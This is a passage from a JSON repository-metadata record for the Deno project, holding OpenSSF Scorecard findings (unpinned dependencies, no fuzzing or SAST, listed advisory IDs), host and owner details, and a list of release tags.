.github/workflows/node_compat_test.yml:67: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/node_compat_test.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/node_compat_test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:28: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/npm_publish.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/npm_publish.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/post_publish.yml:14: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/post_publish.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/post_publish.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/pr.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/pr.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:65: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:73: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:104: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:119: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:125: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:133: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:138: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/promote_to_release.yml:155: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/promote_to_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/start_release.yml:34: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/start_release.yml:37: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/start_release.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/version_bump.yml:35: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:40: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/version_bump.yml:43: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/version_bump.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/wpt_epoch.yml:38: update your workflow using https://app.stepsecurity.io/secureworkflow/denoland/deno/wpt_epoch.yml/main?enable=pin","Warn: containerImage not pinned by hash: .devcontainer/Dockerfile:1: pin your Docker image by updating mcr.microsoft.com/devcontainers/rust:1 to mcr.microsoft.com/devcontainers/rust:1@sha256:fc57fb865035c5395e85246c8842b071ced6e7cde727b3c98abbcc794eaf4759","Warn: downloadThenRun not pinned by hash: .devcontainer/Dockerfile:10","Info:   0 out of  25 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of  35 third-party GitHubAction dependencies pinned","Info:   0 out of   1 containerImage dependencies pinned","Info:   0 out of   1 downloadThenRun dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 30 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":6,"reason":"4 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GHSA-v7pc-74h8-xq2h","Warn: Project is vulnerable to: RUSTSEC-2025-0006","Warn: Project is vulnerable to: RUSTSEC-2024-0436","Warn: Project is vulnerable to: RUSTSEC-2023-0071 / GHSA-4grx-2x9w-596c / GHSA-c38w-74pg-36hr"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T04:23:13.226Z","repository_id":37251508,"created_at":"2025-08-18T04:23:13.226Z","updated_at":"2025-08-18T04:23:13.226Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":341189360,"owners_count":37094232,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-22T15:14:58.755Z","status":"online","status_checked_at":"2026-09-06T02:00:05.694Z","response_time":54,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"denoland","name":"Deno","uuid":"42048915","kind":"organization","description":"","email":"support@deno.com","website":"https://deno.land","location":null,"twitter":"deno_land","company":null,"icon_url":"https://avatars.githubusercontent.com/u/42048915?v=4","repositories_count":89,"last_synced_at":"2023-04-09T21:37:02.792Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/denoland","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-02T16:32:27.195Z","updated_at":"2023-04-09T21:37:03.563Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/denoland/repositories"},"tags":[{"name":"v2.9.5","sha":"17fadf33a8df3af9488b9f42efd1f2290d6dc7a3","kind":"commit","published_at":"2026-08-06T11:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.5/manifests"},{"name":"v2.9.4","sha":"14eea3160ae5834476aa3b9d317b8d41d991b982","kind":"commit","published_at":"2026-07-23T14:13:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.4/manifests"},{"name":"v2.9.3","sha":"f39575ecd50602a5b42b1ba8e93849460de9fcf4","kind":"commit","published_at":"2026-07-15T13:38:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.3/manifests"},{"name":"v2.9.2","sha":"356c132ed60e679b34535a287a493193aa8bb6a4","kind":"commit","published_at":"2026-07-08T10:45:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.2/manifests"},{"name":"v2.9.1","sha":"7afe265234add47e7602f2e91c318f3eff245aa8","kind":"commit","published_at":"2026-07-01T13:28:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.1/manifests"},{"name":"v2.9.0","sha":"94d375ddd02b7b9eb464781e4bd9e68bf262aacc","kind":"commit","published_at":"2026-06-25T11:49:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.9.0/manifests"},{"name":"v2.8.3","sha":"ba699088698c7b4a2fbea33acc4dcd6571789452","kind":"commit","published_at":"2026-06-11T12:02:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.3/manifests"},{"name":"v2.8.2","sha":"085be0b5ff8ca3ccfe58318afe0939c4d4af9743","kind":"commit","published_at":"2026-06-03T11:51:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.2/manifests"},{"name":"v2.8.1","sha":"3e2030bc01776ce6b4ca355b1e78c4cb98c82dca","kind":"commit","published_at":"2026-05-27T10:23:20.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.1/manifests"},{"name":"v2.8.0","sha":"fbb5be31ac23ef40f51025d6aeaaa91d9f082e4a","kind":"commit","published_at":"2026-05-22T08:06:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.8.0/manifests"},{"name":"v2.7.14","sha":"2d674b25625bcc367853d00fe86f6e84390f88cb","kind":"commit","published_at":"2026-04-28T12:41:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.14","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.14/manifests"},{"name":"v2.7.13","sha":"eea91269eb83ff8065afe2e424c8fe78c4b1f448","kind":"commit","published_at":"2026-04-22T11:22:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.13","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.13/manifests"},{"name":"v2.7.12","sha":"825d2647dd0728723623623b6c7b00da7ddad10d","kind":"commit","published_at":"2026-04-09T18:18:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.12","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.12/manifests"},{"name":"v2.7.11","sha":"6ddbb099662ea78a62af79484ae773cd9058c815","kind":"commit","published_at":"2026-04-01T09:31:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.11","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.11/manifests"},{"name":"v2.7.10","sha":"fde6c9c11a5ae8e0dc85f8737b34be11d2aaef32","kind":"commit","published_at":"2026-03-31T12:34:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.10/manifests"},{"name":"v2.7.9","sha":"f065b072ab052602746b4be8da37ad90e51aee70","kind":"commit","published_at":"2026-03-27T10:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.9/manifests"},{"name":"v2.7.8","sha":"c394911f8edc7591de8da65c7b6690bcbc78afc1","kind":"commit","published_at":"2026-03-25T14:14:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.8/manifests"},{"name":"v2.7.7","sha":"8fa9085f90849222bd56facddc16ac288c8ee62e","kind":"commit","published_at":"2026-03-19T11:52:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.7/manifests"},{"name":"v2.7.6","sha":"ffbaf13c354a6433a66c2335ab16c4567d357be6","kind":"commit","published_at":"2026-03-18T10:27:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.6/manifests"},{"name":"v2.7.5","sha":"0238181e8a95be0885da93bbc99997988d07bff0","kind":"commit","published_at":"2026-03-11T09:51:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.5/manifests"},{"name":"v2.7.4","sha":"8274bf758236405d50046dbe31beba96b6d3d2f6","kind":"commit","published_at":"2026-03-05T12:10:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.4/manifests"},{"name":"v2.7.3","sha":"e78a7fa8d86848a759e6743537cf90013c7160b1","kind":"commit","published_at":"2026-03-04T14:23:37.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.3/manifests"},{"name":"v2.7.2","sha":"83e374686079a2f067115e60ad91ec38f4f6118b","kind":"commit","published_at":"2026-03-03T14:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.2/manifests"},{"name":"v2.7.1","sha":"1df618d969894353731981a17784816167ad82fb","kind":"commit","published_at":"2026-02-25T15:42:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.1","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.1/manifests"},{"name":"v2.7.0","sha":"fb4db333c37ec1242a6f80738510d214018fea53","kind":"commit","published_at":"2026-02-25T09:11:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v2.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.7.0/manifests"},{"name":"v2.6.10","sha":"8871ade7aa09eb907a04ee61a427f5ba14c54014","kind":"commit","published_at":"2026-02-17T14:05:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.10","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.10/manifests"},{"name":"v2.6.9","sha":"7a9888857e01c02417fd38144d4bf0ace73eb6ab","kind":"commit","published_at":"2026-02-10T14:53:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.9","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.9/manifests"},{"name":"v2.6.8","sha":"7ab62a769be154c0926fe8be640d48674eb79614","kind":"commit","published_at":"2026-02-02T13:42:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.8","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.8/manifests"},{"name":"v2.6.7","sha":"d155af667f0e57277dc992d1b9609d5e6712908d","kind":"commit","published_at":"2026-01-29T11:26:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.7/manifests"},{"name":"v2.5.7","sha":"8533c169419c6c92069cb5981a73ee9c36d19798","kind":"commit","published_at":"2026-01-27T16:21:19.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.5.7","html_url":"https://github.com/denoland/deno/releases/tag/v2.5.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.5.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.5.7/manifests"},{"name":"v2.6.6","sha":"b9b87a6bfb61a5d8855ee1578620ac3a9393b6bb","kind":"commit","published_at":"2026-01-22T19:37:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.6","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.6/manifests"},{"name":"v2.6.5","sha":"c356d9a621fccad5047497238039cde10613b278","kind":"commit","published_at":"2026-01-15T11:11:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.5","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.5/manifests"},{"name":"v2.6.4","sha":"658638b3262a90c3e92fe96887fd898b5b1a78d7","kind":"commit","published_at":"2026-01-05T16:18:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.4","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.4/manifests"},{"name":"v2.6.3","sha":"3fbb1daddbc9333cddf0d8c0735811717dd70f7a","kind":"commit","published_at":"2025-12-20T11:07:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.3","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v2.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v2.6.3/manifests"},{"name":"v2.6.2","sha":"9cd8077757a365f2e9e36499c2330d2d4facbb2e","kind":"commit","published_at":"2025-12-19T14:04:14.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v2.6.2","html_url":"https://github.com/denoland/deno/releases/tag/v2.6.